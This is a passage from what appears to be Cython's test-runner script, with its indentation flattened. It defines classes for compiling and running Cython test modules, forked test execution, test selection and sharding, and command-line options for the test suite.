if IS_PY2:
workdir = str(workdir) # work around type check in distutils that disallows unicode strings
build_extension.extensions = [extension]
build_extension.build_temp = workdir
build_extension.build_lib = workdir
build_extension.run()
finally:
os.chdir(cwd)
try:
get_ext_fullpath = build_extension.get_ext_fullpath
except AttributeError:
def get_ext_fullpath(ext_name, self=build_extension):
# copied from distutils.command.build_ext (missing in Py2.[45])
fullname = self.get_ext_fullname(ext_name)
modpath = fullname.split('.')
filename = self.get_ext_filename(modpath[-1])
if not self.inplace:
filename = os.path.join(*modpath[:-1]+[filename])
return os.path.join(self.build_lib, filename)
package = '.'.join(modpath[0:-1])
build_py = self.get_finalized_command('build_py')
package_dir = os.path.abspath(build_py.get_package_dir(package))
return os.path.join(package_dir, filename)
return get_ext_fullpath(module)
def compile(self, test_directory, module, workdir, incdir,
expect_errors, expect_warnings, annotate):
expected_errors = expected_warnings = errors = warnings = ()
if expect_errors or expect_warnings:
expected_errors, expected_warnings = self.split_source_and_output(
test_directory, module, workdir)
test_directory = workdir
if WITH_CYTHON:
old_stderr = sys.stderr
try:
sys.stderr = ErrorWriter()
with self.stats.time(self.name, self.language, 'cython'):
self.run_cython(test_directory, module, workdir, incdir, annotate)
errors, warnings = sys.stderr.getall()
finally:
sys.stderr = old_stderr
if self.test_determinism and not expect_errors:
workdir2 = workdir + '-again'
os.mkdir(workdir2)
self.run_cython(test_directory, module, workdir2, incdir, annotate)
diffs = []
for file in os.listdir(workdir2):
if (open(os.path.join(workdir, file)).read()
!= open(os.path.join(workdir2, file)).read()):
diffs.append(file)
os.system('diff -u %s/%s %s/%s > %s/%s.diff' % (
workdir, file,
workdir2, file,
workdir2, file))
if diffs:
self.fail('Nondeterministic file generation: %s' % ', '.join(diffs))
tostderr = sys.__stderr__.write
if expected_warnings or (expect_warnings and warnings):
self._match_output(expected_warnings, warnings, tostderr)
if 'cerror' in self.tags['tag']:
if errors:
tostderr("\n=== Expected C compile error ===\n")
tostderr("\n=== Got Cython errors: ===\n")
tostderr('\n'.join(errors))
tostderr('\n\n')
raise RuntimeError('should have generated extension code')
elif errors or expected_errors:
self._match_output(expected_errors, errors, tostderr)
return None
so_path = None
if not self.cython_only:
from Cython.Utils import captured_fd, print_bytes
from distutils.errors import CompileError, LinkError
show_output = True
get_stderr = get_stdout = None
try:
with captured_fd(1) as get_stdout:
with captured_fd(2) as get_stderr:
with self.stats.time(self.name, self.language, 'compile-%s' % self.language):
so_path = self.run_distutils(test_directory, module, workdir, incdir)
except Exception as exc:
if ('cerror' in self.tags['tag'] and
((get_stderr and get_stderr()) or
isinstance(exc, (CompileError, LinkError)))):
show_output = False # expected C compiler failure
else:
raise
else:
if 'cerror' in self.tags['tag']:
raise RuntimeError('should have failed C compile')
finally:
if show_output:
stdout = get_stdout and get_stdout().strip()
stderr = get_stderr and filter_stderr(get_stderr()).strip()
if so_path and not stderr:
# normal success case => ignore non-error compiler output
stdout = None
if stdout:
print_bytes(
stdout, header_text="\n=== C/C++ compiler output: =========\n",
end=None, file=sys.__stderr__)
if stderr:
print_bytes(
stderr, header_text="\n=== C/C++ compiler error output: ===\n",
end=None, file=sys.__stderr__)
if stdout or stderr:
tostderr("\n====================================\n")
return so_path
def _match_output(self, expected_output, actual_output, write):
try:
for expected, actual in zip(expected_output, actual_output):
self.assertEqual(expected, actual)
if len(actual_output) < len(expected_output):
expected = expected_output[len(actual_output)]
self.assertEqual(expected, None)
elif len(actual_output) > len(expected_output):
unexpected = actual_output[len(expected_output)]
self.assertEqual(None, unexpected)
except AssertionError:
write("\n=== Expected: ===\n")
write('\n'.join(expected_output))
write("\n\n=== Got: ===\n")
write('\n'.join(actual_output))
write('\n\n')
raise
class CythonRunTestCase(CythonCompileTestCase):
def setUp(self):
CythonCompileTestCase.setUp(self)
from Cython.Compiler import Options
Options.clear_to_none = False
def description_name(self):
return self.name if self.cython_only else "and running %s" % self.name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
result.startTest(self)
try:
self.setUp()
try:
self.success = False
ext_so_path = self.runCompileTest()
failures, errors, skipped = len(result.failures), len(result.errors), len(result.skipped)
if not self.cython_only and ext_so_path is not None:
self.run_tests(result, ext_so_path)
if failures == len(result.failures) and errors == len(result.errors):
# No new errors...
self.success = True
finally:
check_thread_termination()
except SkipTest as exc:
result.addSkip(self, str(exc))
result.stopTest(self)
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
def run_tests(self, result, ext_so_path):
self.run_doctests(self.module, result, ext_so_path)
def run_doctests(self, module_or_name, result, ext_so_path):
def run_test(result):
if isinstance(module_or_name, basestring):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(module_or_name, ext_so_path)
else:
module = module_or_name
tests = doctest.DocTestSuite(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
run_forked_test(result, run_test, self.shortDescription(), self.fork)
def run_forked_test(result, run_func, test_name, fork=True):
if not fork or sys.version_info[0] >= 3 or not hasattr(os, 'fork'):
run_func(result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
return
# fork to make sure we do not keep the tested module loaded
result_handle, result_file = tempfile.mkstemp()
os.close(result_handle)
child_id = os.fork()
if not child_id:
result_code = 0
try:
try:
tests = partial_result = None
try:
partial_result = PartialTestResult(result)
run_func(partial_result)
sys.stdout.flush()
sys.stderr.flush()
gc.collect()
except Exception:
result_code = 1
if partial_result is not None:
if tests is None:
# importing failed, try to fake a test class
tests = _FakeClass(
failureException=sys.exc_info()[1],
_shortDescription=test_name,
module_name=None)
partial_result.addError(tests, sys.exc_info())
if partial_result is not None:
with open(result_file, 'wb') as output:
pickle.dump(partial_result.data(), output)
except:
traceback.print_exc()
finally:
try: sys.stderr.flush()
except: pass
try: sys.stdout.flush()
except: pass
os._exit(result_code)
try:
cid, result_code = os.waitpid(child_id, 0)
module_name = test_name.split()[-1]
# os.waitpid returns the child's result code in the
# upper byte of result_code, and the signal it was
# killed by in the lower byte
if result_code & 255:
raise Exception(
"Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
module_name, result_code & 255))
result_code >>= 8
if result_code in (0,1):
try:
with open(result_file, 'rb') as f:
PartialTestResult.join_results(result, pickle.load(f))
except Exception:
raise Exception(
"Failed to load test result from test in module '%s' after exit status %d,"
" see test output for details." % (module_name, result_code))
if result_code:
raise Exception(
"Tests in module '%s' exited with status %d, see test output for details." % (
module_name, result_code))
finally:
try:
os.unlink(result_file)
except:
pass
class PureDoctestTestCase(unittest.TestCase):
def __init__(self, module_name, module_path, tags, stats=None):
self.tags = tags
self.module_name = self.name = module_name
self.module_path = module_path
self.stats = stats
unittest.TestCase.__init__(self, 'run')
def shortDescription(self):
return "running pure doctests in %s" % self.module_name
def run(self, result=None):
if result is None:
result = self.defaultTestResult()
loaded_module_name = 'pure_doctest__' + self.module_name
result.startTest(self)
try:
self.setUp()
import imp
with self.stats.time(self.name, 'py', 'pyimport'):
m = imp.load_source(loaded_module_name, self.module_path)
try:
with self.stats.time(self.name, 'py', 'pyrun'):
doctest.DocTestSuite(m).run(result)
finally:
del m
if loaded_module_name in sys.modules:
del sys.modules[loaded_module_name]
check_thread_termination()
except Exception:
result.addError(self, sys.exc_info())
result.stopTest(self)
try:
self.tearDown()
except Exception:
pass
if 'mypy' in self.tags['tag']:
try:
from mypy import api as mypy_api
except ImportError:
pass
else:
with self.stats.time(self.name, 'py', 'mypy'):
mypy_result = mypy_api.run([
self.module_path,
'--ignore-missing-imports',
'--follow-imports', 'skip',
])
if mypy_result[2]:
self.fail(mypy_result[0])
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
def __init__(self, base_result):
_TextTestResult.__init__(
self, self._StringIO(), True,
base_result.dots + base_result.showAll*2)
def strip_error_results(self, results):
for test_case, error in results:
for attr_name in filter(is_private_field, dir(test_case)):
if attr_name == '_dt_test':
test_case._dt_test = _FakeClass(
name=test_case._dt_test.name)
elif attr_name != '_shortDescription':
setattr(test_case, attr_name, None)
def data(self):
self.strip_error_results(self.failures)
self.strip_error_results(self.errors)
return (self.failures, self.errors, self.skipped, self.testsRun,
self.stream.getvalue())
def join_results(result, data):
"""Static method for merging the result back into the main
result object.
"""
failures, errors, skipped, tests_run, output = data
if output:
result.stream.write(output)
result.errors.extend(errors)
result.skipped.extend(skipped)
result.failures.extend(failures)
result.testsRun += tests_run
join_results = staticmethod(join_results)
class _StringIO(StringIO):
def writeln(self, line):
self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
def shortDescription(self):
return "compiling (%s) tests in %s" % (self.language, self.description_name())
def run_tests(self, result, ext_so_path):
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
tests = unittest.defaultTestLoader.loadTestsFromModule(module)
with self.stats.time(self.name, self.language, 'run'):
tests.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
def setUp(self):
CythonRunTestCase.setUp(self)
from Cython.Compiler import Options
Options.error_on_unknown_names = False
Options.error_on_uninitialized = False
Options._directive_defaults.update(dict(
binding=True, always_allow_keywords=True,
set_initial_path="SOURCEFILE"))
patch_inspect_isfunction()
def related_files(self, test_directory, module_name):
return _list_pyregr_data_files(test_directory)
def _run_unittest(self, result, *classes):
"""Run tests from unittest.TestCase-derived classes."""
valid_types = (unittest.TestSuite, unittest.TestCase)
suite = unittest.TestSuite()
for cls in classes:
if isinstance(cls, str):
if cls in sys.modules:
suite.addTest(unittest.findTestCases(sys.modules[cls]))
else:
raise ValueError("str arguments must be keys in sys.modules")
elif isinstance(cls, valid_types):
suite.addTest(cls)
else:
suite.addTest(unittest.makeSuite(cls))
with self.stats.time(self.name, self.language, 'run'):
suite.run(result)
def _run_doctest(self, result, module):
self.run_doctests(module, result, None)
def run_tests(self, result, ext_so_path):
try:
from test import support
except ImportError: # Python2.x
from test import test_support as support
def run_test(result):
def run_unittest(*classes):
return self._run_unittest(result, *classes)
def run_doctest(module, verbosity=None):
return self._run_doctest(result, module)
backup = (support.run_unittest, support.run_doctest)
support.run_unittest = run_unittest
support.run_doctest = run_doctest
try:
try:
sys.stdout.flush() # helps in case of crashes
with self.stats.time(self.name, self.language, 'import'):
module = import_ext(self.module, ext_so_path)
sys.stdout.flush() # helps in case of crashes
if hasattr(module, 'test_main'):
# help 'doctest.DocFileTest' find the module path through frame inspection
fake_caller_module_globals = {
'module': module,
'__name__': module.__name__,
}
call_tests = eval(
'lambda: module.test_main()',
fake_caller_module_globals, fake_caller_module_globals)
call_tests()
sys.stdout.flush() # helps in case of crashes
except (unittest.SkipTest, support.ResourceDenied):
result.addSkip(self, 'ok')
finally:
support.run_unittest, support.run_doctest = backup
run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
def __init__(self, cython_dir):
self.cython_dir = cython_dir
unittest.TestCase.__init__(self)
def runTest(self):
import pycodestyle
config_file = os.path.join(self.cython_dir, "setup.cfg")
if not os.path.exists(config_file):
config_file=os.path.join(os.path.dirname(__file__), "setup.cfg")
paths = []
for codedir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
paths += glob.glob(os.path.join(self.cython_dir, codedir + "/**/*.py"), recursive=True)
style = pycodestyle.StyleGuide(config_file=config_file)
print("") # Fix the first line of the report.
result = style.check_files(paths)
self.assertEqual(result.total_errors, 0, "Found code style errors.")
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
def file_matches(filename):
return filename.startswith("Test") and filename.endswith(".py")
def package_matches(dirname):
return dirname == "Tests"
loader = unittest.TestLoader()
if include_debugger:
skipped_dirs = []
else:
skipped_dirs = ['Cython' + os.path.sep + 'Debugger' + os.path.sep]
for dirpath, dirnames, filenames in os.walk(path):
if dirpath != path and "__init__.py" not in filenames:
skipped_dirs.append(dirpath + os.path.sep)
continue
skip = False
for dir in skipped_dirs:
if dirpath.startswith(dir):
skip = True
if skip:
continue
parentname = os.path.split(dirpath)[-1]
if package_matches(parentname):
for f in filenames:
if file_matches(f):
filepath = os.path.join(dirpath, f)[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not any(1 for match in selectors if match(modulename)):
continue
if any(1 for match in exclude_selectors if match(modulename)):
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
def package_matches(dirname):
if dirname == 'Debugger' and not include_debugger:
return False
return dirname not in ("Mac", "Distutils", "Plex", "Tempita")
def file_matches(filename):
filename, ext = os.path.splitext(filename)
blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
'TestLibCython']
return (ext == '.py' and not
'~' in filename and not
'#' in filename and not
filename.startswith('.') and not
filename in blacklist)
import doctest
for dirpath, dirnames, filenames in os.walk(path):
for dir in list(dirnames):
if not package_matches(dir):
dirnames.remove(dir)
for f in filenames:
if file_matches(f):
if not f.endswith('.py'): continue
filepath = os.path.join(dirpath, f)
if os.path.getsize(filepath) == 0: continue
filepath = filepath[:-len(".py")]
modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
if not [ 1 for match in selectors if match(modulename) ]:
continue
if [ 1 for match in exclude_selectors if match(modulename) ]:
continue
if 'in_gdb' in modulename:
# These should only be imported from gdb.
continue
module = __import__(modulename)
for x in modulename.split('.')[1:]:
module = getattr(module, x)
if hasattr(module, "__doc__") or hasattr(module, "__test__"):
try:
suite.addTest(doctest.DocTestSuite(module))
except ValueError: # no tests
pass
class EndToEndTest(unittest.TestCase):
"""
This is a test of build/*.srctree files, where srctree defines a full
directory structure and its header gives a list of commands to run.
"""
cython_root = os.path.dirname(os.path.abspath(__file__))
def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
capture=True):
self.name = os.path.splitext(os.path.basename(treefile))[0]
self.treefile = treefile
self.workdir = os.path.join(workdir, self.name)
self.cleanup_workdir = cleanup_workdir
self.stats = stats
self.capture = capture
cython_syspath = [self.cython_root]
for path in sys.path:
if path.startswith(self.cython_root) and path not in cython_syspath:
# Py3 installation and refnanny build prepend their
# fixed paths to sys.path => prefer that over the
# generic one (cython_root itself goes last)
cython_syspath.append(path)
self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
unittest.TestCase.__init__(self)
def shortDescription(self):
return "End-to-end %s" % self.name
def setUp(self):
from Cython.TestUtils import unpack_source_tree
_, self.commands = unpack_source_tree(self.treefile, self.workdir, self.cython_root)
self.old_dir = os.getcwd()
os.chdir(self.workdir)
def tearDown(self):
if self.cleanup_workdir:
for trial in range(5):
try:
shutil.rmtree(self.workdir)
except OSError:
time.sleep(0.1)
else:
break
os.chdir(self.old_dir)
def _try_decode(self, content):
try:
return content.decode()
except UnicodeDecodeError:
return content.decode('iso-8859-1')
def runTest(self):
self.success = False
old_path = os.environ.get('PYTHONPATH')
env = dict(os.environ)
new_path = self.cython_syspath
if old_path:
new_path = new_path + os.pathsep + self.workdir + os.pathsep + old_path
env['PYTHONPATH'] = new_path
if not env.get("PYTHONIOENCODING"):
env["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
cmd = []
out = []
err = []
for command_no, command in enumerate(self.commands, 1):
with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
'etoe-build' if 'setup.py' in command else 'etoe-run'):
if self.capture:
p = subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE, env=env)
_out, _err = p.communicate()
res = p.returncode
else:
p = subprocess.call(command, env=env)
_out, _err = b'', b''
res = p
cmd.append(command)
out.append(_out)
err.append(_err)
if res != 0:
for c, o, e in zip(cmd, out, err):
sys.stderr.write("%s\n%s\n%s\n\n" % (
c, self._try_decode(o), self._try_decode(e)))
self.assertEqual(0, res, "non-zero exit status")
self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
working_dir = "Demos/embed"
def setUp(self):
self.old_dir = os.getcwd()
os.chdir(self.working_dir)
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
def tearDown(self):
try:
os.system(
"make PYTHON='%s' clean > /dev/null" % sys.executable)
except:
pass
os.chdir(self.old_dir)
def test_embed(self):
libname = sysconfig.get_config_var('LIBRARY')
libdir = sysconfig.get_config_var('LIBDIR')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
# report the error for the original directory
libdir = sysconfig.get_config_var('LIBDIR')
cython = 'cython.py'
if sys.version_info[0] >=3 and CY3_DIR:
cython = os.path.join(CY3_DIR, cython)
cython = os.path.abspath(os.path.join('..', '..', cython))
try:
subprocess.check_output([
"make",
"PYTHON='%s'" % sys.executable,
"CYTHON='%s'" % cython,
"LIBDIR1='%s'" % libdir,
"paths", "test",
])
except subprocess.CalledProcessError as err:
print(err.output.decode())
raise
self.assertTrue(True) # :)
def load_listfile(filename):
# just re-use the FileListExclude implementation
fle = FileListExcluder(filename)
return list(fle.excludes)
class MissingDependencyExcluder(object):
def __init__(self, deps):
# deps: { matcher func : module name }
self.exclude_matchers = []
for matcher, mod in deps.items():
try:
__import__(mod)
except ImportError:
self.exclude_matchers.append(string_selector(matcher))
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname, tags):
self.tests_missing_deps.append(testname)
return True
return False
class VersionDependencyExcluder(object):
def __init__(self, deps):
# deps: { version : matcher func }
from sys import version_info
self.exclude_matchers = []
for ver, (compare, matcher) in deps.items():
if compare(version_info, ver):
self.exclude_matchers.append(matcher)
self.tests_missing_deps = []
def __call__(self, testname, tags=None):
for matcher in self.exclude_matchers:
if matcher(testname):
self.tests_missing_deps.append(testname)
return True
return False
class FileListExcluder(object):
def __init__(self, list_file, verbose=False):
self.verbose = verbose
self.excludes = {}
self._list_file = os.path.relpath(list_file)
with open(list_file) as f:
for line in f:
line = line.strip()
if line and line[0] != '#':
self.excludes[line.split()[0]] = True
def __call__(self, testname, tags=None):
exclude = any(string_selector(ex)(testname) for ex in self.excludes)
if exclude and self.verbose:
print("Excluding %s because it's listed in %s"
% (testname, self._list_file))
return exclude
class TagsSelector(object):
def __init__(self, tag, value):
self.tag = tag
self.value = value
def __call__(self, testname, tags=None):
if tags is None:
return False
else:
return self.value in tags[self.tag]
class RegExSelector(object):
def __init__(self, pattern_string):
try:
self.regex_matches = re.compile(pattern_string, re.I|re.U).search
except re.error:
print('Invalid pattern: %r' % pattern_string)
raise
def __call__(self, testname, tags=None):
return self.regex_matches(testname)
def string_selector(s):
if ':' in s:
return TagsSelector(*s.split(':', 1))
else:
return RegExSelector(s)
class ShardExcludeSelector(object):
# This is an exclude selector so it can override the (include) selectors.
# It may not provide uniform distribution (in time or count), but is a
# determanistic partition of the tests which is important.
# Random seed to improve the hash distribution.
_seed = base64.b64decode(b'2ged1EtsGz/GkisJr22UcLeP6n9XIaA5Vby2wM49Wvg=')
def __init__(self, shard_num, shard_count):
self.shard_num = shard_num
self.shard_count = shard_count
def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
# Cannot use simple hash() here as shard processes might use different hash seeds.
# CRC32 is fast and simple, but might return negative values in Py2.
hashval = _hash(self._seed + testname) & 0x7fffffff if _is_py2 else _hash(self._seed + testname.encode())
return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
pass
threads_seen = []
def check_thread_termination(ignore_seen=True):
if threading is None: # no threading enabled in CPython
return
current = threading.current_thread()
blocking_threads = []
for t in threading.enumerate():
if not t.is_alive() or t == current or t.name == 'time_stamper':
continue
t.join(timeout=2)
if t.is_alive():
if not ignore_seen:
blocking_threads.append(t)
continue
for seen in threads_seen:
if t is seen:
break
else:
threads_seen.append(t)
blocking_threads.append(t)
if not blocking_threads:
return
sys.stderr.write("warning: left-over threads found after running test:\n")
for t in blocking_threads:
sys.stderr.write('...%s\n' % repr(t))
raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
try:
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return p.communicate()[0].decode('UTF-8')
except OSError:
return ''
def get_version():
from Cython.Compiler.Version import version as cython_version
full_version = cython_version
top = os.path.dirname(os.path.abspath(__file__))
if os.path.exists(os.path.join(top, '.git')):
old_dir = os.getcwd()
try:
os.chdir(top)
head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
diff = subprocess_output(['git', 'diff', '--stat']).strip()
if head_commit != version_commit:
full_version += " " + head_commit
if diff:
full_version += ' + uncommitted changes'
finally:
os.chdir(old_dir)
return full_version
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
try:
_orig_stdout.flush()
_orig_stderr.flush()
finally:
os._exit(status)
def main():
global DISTDIR, WITH_CYTHON
# Set an environment variable to the top directory
os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))
DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))
from Cython.Compiler import DebugFlags
args = []
for arg in sys.argv[1:]:
if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
setattr(DebugFlags, arg[2:].replace('-', '_'), True)
else:
args.append(arg)
from optparse import OptionParser
parser = OptionParser()
parser.add_option("--no-cleanup", dest="cleanup_workdir",
action="store_false", default=True,
help="do not delete the generated C files (allows passing --no-cython on next run)")
parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
action="store_false", default=True,
help="do not delete the generated shared library files (allows manual module experimentation)")
parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
action="store_false", default=True,
help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
parser.add_option("--no-cython", dest="with_cython",
action="store_false", default=True,
help="do not run the Cython compiler, only the C compiler")
parser.add_option("--compiler", dest="compiler", default=None,
help="C compiler type")
backend_list = ','.join(BACKENDS)
parser.add_option("--backends", dest="backends", default=backend_list,
help="select backends to test (default: %s)" % backend_list)
parser.add_option("--no-c", dest="use_c",
action="store_false", default=True,
help="do not test C compilation backend")
parser.add_option("--no-cpp", dest="use_cpp",
action="store_false", default=True,
help="do not test C++ compilation backend")
parser.add_option("--no-unit", dest="unittests",
action="store_false", default=True,
help="do not run the unit tests")
parser.add_option("--no-doctest", dest="doctests",
action="store_false", default=True,
help="do not run the doctests")
parser.add_option("--no-file", dest="filetests",
action="store_false", default=True,
help="do not run the file based tests")
parser.add_option("--no-pyregr", dest="pyregr",
action="store_false", default=True,
help="do not run the regression tests of CPython in tests/pyregr/")
parser.add_option("--no-examples", dest="examples",
action="store_false", default=True,
help="Do not run the documentation tests in the examples directory.")
parser.add_option("--no-code-style", dest="code_style",
action="store_false", default=True,
help="Do not run the code style (PEP8) checks.")
parser.add_option("--cython-only", dest="cython_only",
action="store_true", default=False,
help="only compile pyx to c, do not run C compiler or run the tests")
parser.add_option("--no-refnanny", dest="with_refnanny",
action="store_false", default=True,
help="do not regression test reference counting")
parser.add_option("--no-fork", dest="fork",
action="store_false", default=True,
help="do not fork to run tests")
parser.add_option("--sys-pyregr", dest="system_pyregr",
action="store_true", default=False,
help="run the regression tests of the CPython installation")
parser.add_option("-x", "--exclude", dest="exclude",
action="append", metavar="PATTERN",
help="exclude tests matching the PATTERN")
parser.add_option("--listfile", dest="listfile",
action="append",
help="specify a file containing a list of tests to run")
parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
type=int, default=1,
help="shard this run into several parallel runs")
parser.add_option("--shard_num", dest="shard_num", metavar="K",
type=int, default=-1,
help="test only this single shard")
parser.add_option("--profile", dest="profile",
action="store_true", default=False,
help="enable profiling of the tests")
parser.add_option("-C", "--coverage", dest="coverage",
action="store_true", default=False,
help="collect source coverage data for the Compiler")
parser.add_option("--coverage-xml", dest="coverage_xml",
action="store_true", default=False,
help="collect source coverage data for the Compiler in XML format")
parser.add_option("--coverage-html", dest="coverage_html",
action="store_true", default=False,
help="collect source coverage data for the Compiler in HTML format")
parser.add_option("-A", "--annotate", dest="annotate_source",
action="store_true", default=True,
help="generate annotated HTML versions of the test source files")
parser.add_option("--no-annotate", dest="annotate_source",
action="store_false",
help="do not generate annotated HTML versions of the test source files")
parser.add_option("-v", "--verbose", dest="verbosity",
action="count", default=0,
help="display test progress, pass twice to print test names")
parser.add_option("-T", "--ticket", dest="tickets",
action="append",
help="a bug ticket number to run the respective test in 'tests/*'")
parser.add_option("-3", dest="language_level",
action="store_const", const=3, default=2,
help="set language level to Python 3 (useful for running the CPython regression tests)'")
parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
help="write test results in XML to directory DIR")
parser.add_option("--exit-ok", dest="exit_ok", default=False,
action="store_true",
help="exit without error code even on test failures")
parser.add_option("--failfast", dest="failfast", default=False,
action="store_true",
help="stop on first failure or error")
parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
help=("Directory to look for the file based "
"tests (the ones which are deactivated with '--no-file'."))
parser.add_option("--examples-dir", dest="examples_dir",
default=os.path.join(DISTDIR, 'docs', 'examples'),
help="Directory to look for documentation example tests")
parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
help="working directory")
parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
help="Cython installation directory (default: use local source version)")
parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
help="configure for easier use with a debugger (e.g. gdb)")
parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
help="use pyximport to automatically compile imported .pyx and .py files")
parser.add_option("--watermark", dest="watermark", default=None,
help="deterministic generated by string")
parser.add_option("--use_common_utility_dir", default=False, action="store_true")
parser.add_option("--use_formal_grammar", default=False, action="store_true")
parser.add_option("--test_determinism", default=False, action="store_true",
help="test whether Cython's output is deterministic")
parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
help="Compiles Cython using CPython's LIMITED_API")
options, cmd_args = parser.parse_args(args)
if options.with_cython and sys.version_info[0] >= 3:
sys.path.insert(0, options.cython_dir)
# requires glob with the wildcard.
if sys.version_info < (3, 5) or cmd_args:
options.code_style = False
WITH_CYTHON = options.with_cython
coverage = None
if options.coverage or options.coverage_xml or options.coverage_html:
if not WITH_CYTHON:
options.coverage = options.coverage_xml = options.coverage_html = False
elif options.shard_num == -1:
print("Enabling coverage analysis")
from coverage import coverage as _coverage
coverage = _coverage(branch=True)
coverage.erase()
coverage.start()
if options.xml_output_dir:
shutil.rmtree(options.xml_output_dir, ignore_errors=True)
if options.listfile:
for listfile in options.listfile:
cmd_args.extend(load_listfile(listfile))
if options.capture:
keep_alive_interval = 10
else:
keep_alive_interval = None
if options.shard_count > 1 and options.shard_num == -1:
if "PYTHONIOENCODING" not in os.environ:
# Make sure subprocesses can print() Unicode text.
os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
errors = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
errors.append(shard_num)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if errors:
sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
